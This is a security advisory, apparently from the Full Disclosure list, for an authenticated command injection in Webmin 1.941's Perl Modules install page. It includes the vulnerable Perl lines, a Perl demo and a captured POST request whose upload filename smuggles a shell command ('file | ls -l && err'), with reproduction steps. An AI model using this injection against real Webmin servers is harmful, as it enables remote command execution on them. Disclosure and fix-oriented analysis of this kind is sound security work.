Document Title:
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability

Common Vulnerability Scoring System:
8.5
Vulnerability Class:
Command Injection

Current Estimated Price:
2.000€ - 3.000€

Affected Product(s):
Webmin 1.941 (Perl Modules component, Install Module)

Exploitation Technique:
Remote (authenticated)

Severity Level:
High
Technical Details & Description:
A remote, authenticated command injection vulnerability has been discovered
in the official Webmin product.
The vulnerability allows a remote attacker whose account has only the
"Install Module" permission of the Perl Modules component
to execute arbitrary operating system commands.
The cause is that the user-supplied "upload" parameter is passed, without any
check, into the Perl open() function, where it is interpolated into a shell
command line; any shell metacharacters in it therefore result in the
execution of arbitrary commands.

The vulnerability is located in the `/cpan/download.cgi` module, in the
`upload` parameter that carries the file of the module to install.

The security risk of the RCE vulnerability is estimated as High,
with a CVSS (Common Vulnerability Scoring System) score of 8.5.
Exploitation of the RCE web vulnerability requires a low-privileged
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

##When digging in the code:

I needed only to reach this line of code to make it work:

&install_error(&text('download_etar', "<tt>$tar</tt>"));

However, the root problem is user input passed directly into open() and
system(), and it is not limited to that one line; it also affects all of
these lines:

    open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
    system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
    system("$cmd >/dev/null 2>&1 </dev/null");
    %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;
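The following is an added illustration, not code from Webmin or from the advisory author. It reproduces the two-argument open() pipeline shape from download.cgi with the advisory's payload substituted in, next to a hardened form that validates the path and reads the archive in-process with Archive::Tar so no shell is involved. The function names, the regular expression and the constructed sample archive are assumptions made for the demonstration. With the payload "file | ls -l && err" the shell receives `( gunzip -c file | ls -l && err | tar tf - ) 2>&1`, so `ls -l` runs whether or not the file exists.

```perl
#!/usr/bin/perl
# Added illustration (not Webmin's code): the two-argument open() pipe from
# cpan/download.cgi next to a form that never hands the file name to a shell.
use strict;
use warnings;
use File::Temp qw(tempdir);
use Archive::Tar;   # core module; lets the safe version avoid gunzip/tar entirely

# Vulnerable pattern (shape taken from the advisory): $pfile is interpolated
# into a shell command line, so "file | ls -l && err" becomes extra commands.
sub list_archive_vulnerable {
    my ($pfile) = @_;
    open(my $fh, "( gunzip -c $pfile | tar tf - ) 2>&1 |")
        or die "cannot start pipeline: $!";
    my $out = join '', <$fh>;
    close($fh);
    return $out;
}

# Hardened form (assumed fix for illustration): the name must be a plain
# absolute path with no shell metacharacters, and the archive is listed
# in-process, so there is no shell to inject into.  A complete fix would also
# ignore the client-supplied filename and name the temp file server-side.
sub list_archive_safe {
    my ($pfile) = @_;
    $pfile =~ m{\A(/[\w./-]+)\z} or die "rejected file name: $pfile\n";
    $pfile = $1;                      # untainted copy of the validated path
    -f $pfile or die "no such file: $pfile\n";
    # second argument 1 = gzip-compressed; returns member names
    my @members = Archive::Tar->list_archive($pfile, 1);
    return join("\n", @members) . "\n";
}

# Demo: the advisory's payload against both versions, then a genuine archive.
my $payload = 'file | ls -l && err';
print "--- vulnerable: output of the injected commands ---\n";
print list_archive_vulnerable($payload);

print "--- safe: same payload ---\n";
eval { list_archive_safe($payload) };
print "refused: $@" if $@;

# Constructed sample archive so the safe path has something real to list.
my $dir     = tempdir(CLEANUP => 1);
my $archive = "$dir/Module.tar.gz";
my $tar     = Archive::Tar->new;
$tar->add_data('Module-0.01/Makefile.PL', "use ExtUtils::MakeMaker;\n");
$tar->write($archive, COMPRESS_GZIP) or die Archive::Tar->error;
print "--- safe: constructed archive ---\n";
print list_archive_safe($archive);
```

Run it with `perl` on a host that has sh, gunzip and tar; the vulnerable path prints the `ls -l` listing (plus the gunzip and tar errors, because of the `2>&1`), the safe path refuses the payload and lists only the archive member. The safe path needs nothing but core Perl, which is the point: once no shell is involved, the content of the file name can no longer become a command.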


Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload

Proof of Concept (PoC):
The security vulnerability can be exploited by remote attackers with a
low-privileged web-application user account and with no user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the
information and steps below.

1- The attacker must have permission to the Install Perl Modules component.
2- Go to "Others" -> "Perl Modules" -> "Install Modules", select 'From Uploaded
File' and pick any file.
3- The attacker intercepts the request that follows:

--- PoC Session Logs [POST] ---

POST /cpan/download.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 682
Connection: close
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

Content-Disposition: form-data; name="cpan"

Content-Disposition: form-data; name="local"

Content-Disposition: form-data; name="source"

Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
Content-Type: [nothing here]

[Nothing Here]
Content-Disposition: form-data; name="url"


4- Modify the "upload" parameter (the filename in its Content-Disposition) to
the string: "file | ls -l && err"

##Successfully reproduced the Vulnerability.

Sent through the Full Disclosure mailing list